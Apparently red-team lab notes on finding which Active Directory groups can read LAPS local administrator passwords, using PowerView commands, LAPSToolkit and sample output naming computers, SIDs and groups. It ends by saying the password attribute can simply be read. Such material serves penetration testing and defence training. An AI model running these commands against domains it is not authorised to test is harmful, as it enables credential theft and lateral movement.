LAPSToolkit
Manually
Discover which principals are allowed to read the ms-Mcs-AdmPwd attribute by reading its DACL on each computer object.
powershell Get-DomainComputer | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "ms-Mcs-AdmPwd" -and $_.ActiveDirectoryRights -match "ReadProperty" } | select ObjectDn, SecurityIdentifier
CN=WKSTN-2,OU=Workstations,DC=dev,DC=cyberbotic,DC=io S-1-5-21-569305411-121244042-2357301523-1107
CN=WEB,OU=Web Servers,OU=Servers,DC=dev,DC=cyberbotic,DC=io S-1-5-21-569305411-121244042-2357301523-1108
CN=SQL-2,OU=SQL Servers,OU=Servers,DC=dev,DC=cyberbotic,DC=io S-1-5-21-569305411-121244042-2357301523-1108
CN=WKSTN-1,OU=Workstations,DC=dev,DC=cyberbotic,DC=io S-1-5-21-569305411-121244042-2357301523-1107powershell ConvertFrom-SID S-1-5-21-569305411-121244042-2357301523-1107
DEV\Developers
powershell ConvertFrom-SID S-1-5-21-569305411-121244042-2357301523-1108
DEV\Support EngineersLAPSToolkit
Import-Module C:\Tools\LAPSToolkit\LAPSToolkit.ps1Discover computers using LAPS
Get-LAPSComputers
ComputerName Password Expiration
------------ -------- ----------
appsrv01.corp1.com 12/14/2019 04:18:03Discover groups that can enumerate the LAPS data
Use PowerView to enumerate members of that group through the Get-NetGroupMember method, supplying the -GroupName option to specify the group name
To get a computer's password, simply read the attribute
Or with LAPSToolkit
Last updated